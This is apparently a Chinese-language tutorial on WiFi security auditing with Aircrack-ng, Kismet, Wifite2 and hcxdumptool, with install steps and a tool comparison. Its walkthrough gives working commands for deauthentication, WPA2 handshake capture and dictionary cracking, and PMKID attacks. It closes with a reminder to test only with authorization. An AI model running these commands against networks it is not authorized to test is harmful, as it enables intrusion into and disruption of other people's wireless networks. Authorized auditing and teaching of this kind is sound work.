Aircrack-ng+Kismet：无线安全审计工具实战指南

Q: 为什么你需要关注无线安全审计？

>为什么你需要关注无线安全审计？企业WiFi网络是攻击者最容易突破的边界之一。付费工具如Ekahau（企业级$5,000+/年）、WiFi Pineapple（$99-$299硬件）和AirMagnet Survey提供了强大的功能，但开源工具组合Aircrack-ng + Kismet已经能覆盖90%以上的无线审计场景。 本文将带你从零搭建一套完整的无线安全审计环境，覆盖WiFi扫描、监听、抓包、破解的全流程。

为什么你需要关注无线安全审计？

企业WiFi网络是攻击者最容易突破的边界之一。付费工具如Ekahau（企业级$5,000+/年）、WiFi Pineapple（$99-$299硬件）和AirMagnet Survey提供了强大的功能，但开源工具组合Aircrack-ng + Kismet已经能覆盖90%以上的无线审计场景。

本文将带你从零搭建一套完整的无线安全审计环境，覆盖WiFi扫描、监听、抓包、破解的全流程。

一、付费工具定价对比

工具	价格	核心功能	适用场景
Ekahau	$5,000+/年（企业级）	WiFi热力图、信号覆盖分析、自动规划	大型企业WiFi规划
WiFi Pineapple	$99-$299（硬件）	便携式渗透测试、Evil Twin、MITM	现场渗透测试
AirMagnet Survey	价格不公开	专业WiFi勘测、频谱分析	专业无线勘测
Aircrack-ng	免费	抓包、破解、注入、监控	全场景无线审计
Kismet	免费	被动监听、设备发现、IDS	无线威胁检测

关键差距分析：Aircrack-ng缺少Ekahau的企业级WiFi热力图分析能力，Kismet虽然被动监听能力强但不支持主动注入。WiFi Pineapple的便携性是纯软件方案无法完全替代的。

二、Aircrack-ng 完整安装指南

2.1 Ubuntu/Debian 安装

# 方法一：apt安装（推荐，版本可能较旧）
sudo apt update
sudo apt install -y aircrack-ng

# 方法二：从源码编译（获取最新版本）
sudo apt install -y build-essential autoconf automake libtool pkg-config libnl-3-dev libnl-genl-3-dev libssl-dev ethtool zlib1g-dev libpcap-dev libsqlite3-dev libpcre3-dev libhwloc-dev

git clone https://github.com/aircrack-ng/aircrack-ng.git
cd aircrack-ng
autoreconf -i
./configure --with-experimental-plugins
make -j$(nproc)
sudo make install
sudo ldconfig

2.2 Kali Linux

Kali默认已预装Aircrack-ng套件，直接可用：

aircrack-ng --help
# 验证安装，应显示版本信息和用法

2.3 验证安装

aircrack-ng --version
# 应输出类似: Aircrack-ng 1.7 - (C) 2006-2024 Thomas d'Otreppe

三、Kismet 完整安装指南

3.1 Ubuntu 22.04/24.04

# 添加Kismet官方源
wget -O - https://www.kismetwireless.net/repos/kismet-release.gpg.key | sudo gpg --dearmor -o /usr/share/keyrings/kismet-archive-keyring.gpg
echo 'deb [signed-by=/usr/share/keyrings/kismet-archive-keyring.gpg] https://www.kismetwireless.net/repos/apt/release/jammy jammy main' | sudo tee /etc/apt/sources.list.d/kismet.list

sudo apt update
sudo apt install -y kismet

# 启动Kismet服务
sudo systemctl enable kismet
sudo systemctl start kismet

3.2 Kali Linux

sudo apt update
sudo apt install -y kismet

3.3 配置无线网卡监听模式

使用Kismet前，需要将无线网卡设为监听模式：

# 查看无线接口
iwconfig

# 假设无线接口为wlan0
sudo airmon-ng check kill
sudo airmon-ng start wlan0

# 验证监听模式
iwconfig wlan0mon
# Mode应显示为Monitor

四、实战演练：完整WiFi审计流程

4.1 步骤一：WiFi网络发现

# 使用airodump-ng扫描周围WiFi网络
sudo airodump-ng wlan0mon

# 输出示例：
# BSSID              PWR  Beacons  #Data  #/s  CH  MB   ENC  CIPHER  AUTH  ESSID
# AA:BB:CC:DD:EE:FF  -45  12       256    12   6   54e  WPA2 CCMP    PSK   MyNetwork
# 11:22:33:44:55:66  -67  8        102    5    11  54e  WPA2 CCMP    PSK   CorpWiFi

4.2 步骤二：目标锁定与数据捕获

# 锁定目标AP，捕获握手包
# -c 6 表示信道6，--bssid指定目标AP的MAC，-w输出文件前缀
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# 同时在另一个终端执行Deauth攻击，强制客户端重新连接以捕获握手包
sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon
# -0 5 表示发送5个Deauth帧

4.3 步骤三：WiFi密码破解

# 使用字典攻击破解WPA2握手包
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC:DD:EE:FF capture-01.cap

# 如果字典文件未解压
sudo gunzip /usr/share/wordlists/rockyou.txt.gz

# 使用Hashcat进行GPU加速破解（如有GPU）
# 先转换格式
aircrack-ng -j capture_hccapx capture-01.cap
hashcat -m 22000 capture_hccapx.hc22000 /usr/share/wordlists/rockyou.txt

4.4 步骤四：Kismet被动监听

# 启动Kismet进行被动监听
sudo kismet -c wlan0mon

# 浏览器访问 http://localhost:2501 查看Web界面
# 默认用户名: kismet，默认密码: 在首次启动时设置

Kismet会自动发现周围的WiFi网络、蓝牙设备和其它无线信号源，并记录所有检测到的设备信息。

五、Wifite2 自动化审计

对于不想手动执行每一步的用户，Wifite2提供了全自动化的WiFi审计流程：

# 安装Wifite2
sudo apt install -y wifite2
# 或
pip3 install wifite2

# 运行自动化审计
sudo wifite

# Wifite会自动：
# 1. 扫描所有WiFi网络
# 2. 按信号强度排序
# 3. 尝试WPS PIN攻击
# 4. 尝试PMKID攻击
# 5. 尝试四次握手破解

六、hcxdumptool 高级抓包

# 安装
sudo apt install -y hcxdumptool

# 使用PMKID攻击（无需客户端在线）
sudo hcxdumptool -i wlan0mon -o capture.pcapng --filterlist_ap=targets.txt --filtermode=2

# 转换为Hashcat格式
hcxpcapngtool -o hash.hc22000 capture.pcapng

# 使用Hashcat破解
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt

七、功能对比总表

功能维度	Ekahau	WiFi Pineapple	Aircrack-ng	Kismet	Wifite2	hcxdumptool
WiFi扫描	✅	✅	✅	✅	✅	✅
被动监听	❌	✅	✅	✅	❌	✅
主动注入	❌	✅	✅	❌	✅	✅
WPA破解	❌	❌	✅	❌	✅	✅
热力图分析	✅	❌	❌	❌	❌	❌
Evil Twin	❌	✅	手动	❌	❌	❌
便携性	软件	硬件便携	需网卡	需网卡	需网卡	需网卡
PMKID攻击	❌	❌	✅	❌	✅	✅
价格	$5000+/年	$99-299	免费	免费	免费	免费

八、安全与合规提醒

仅在授权范围内使用：未经授权对他人WiFi网络进行审计是违法行为
使用专用测试网络：建议搭建自己的测试环境进行练习
企业审计需书面授权：进行企业WiFi审计前必须获得书面授权
工具无善恶：这些工具的设计目的是发现安全漏洞，帮助加固网络

九、总结

Aircrack-ng + Kismet + Wifite2 + hcxdumptool这套免费工具组合，能够覆盖从网络发现、被动监听、主动注入到密码破解的完整无线审计链路。虽然在企业级WiFi规划（热力图）和便携渗透硬件方面不及付费方案，但对于安全测试和审计工作来说，这套开源组合已经足够强大。

推荐工作流：Kismet被动发现 → Aircrack-ng针对性审计 → hcxdumptool PMKID攻击 → Wifite2自动化兜底。

掌握这些工具，你就拥有了企业级无线安全审计的能力——而且完全免费。

Aircrack-ng+Kismet：无线安全审计工具实战指南

为什么你需要关注无线安全审计？

一、付费工具定价对比

二、Aircrack-ng 完整安装指南

2.1 Ubuntu/Debian 安装

2.2 Kali Linux

2.3 验证安装

三、Kismet 完整安装指南

3.1 Ubuntu 22.04/24.04

3.2 Kali Linux

3.3 配置无线网卡监听模式

四、实战演练：完整WiFi审计流程

4.1 步骤一：WiFi网络发现

4.2 步骤二：目标锁定与数据捕获

4.3 步骤三：WiFi密码破解

4.4 步骤四：Kismet被动监听

五、Wifite2 自动化审计

六、hcxdumptool 高级抓包

七、功能对比总表

八、安全与合规提醒

九、总结

常见问题

评论

为什么你需要关注无线安全审计？

一、付费工具定价对比

二、Aircrack-ng 完整安装指南

2.1 Ubuntu/Debian 安装

2.2 Kali Linux

2.3 验证安装

三、Kismet 完整安装指南

3.1 Ubuntu 22.04/24.04

3.2 Kali Linux

3.3 配置无线网卡监听模式

四、实战演练：完整WiFi审计流程

4.1 步骤一：WiFi网络发现

4.2 步骤二：目标锁定与数据捕获

4.3 步骤三：WiFi密码破解

4.4 步骤四：Kismet被动监听

五、Wifite2 自动化审计

六、hcxdumptool 高级抓包

七、功能对比总表

八、安全与合规提醒

九、总结

常见问题

评论

相关推荐

Wireshark+tcpdump：网络抓包分析工具深度指南

Hashcat+John the Ripper：密码审计工具完全指南

Sliver vs Cobalt Strike：2025开源C2框架深度对比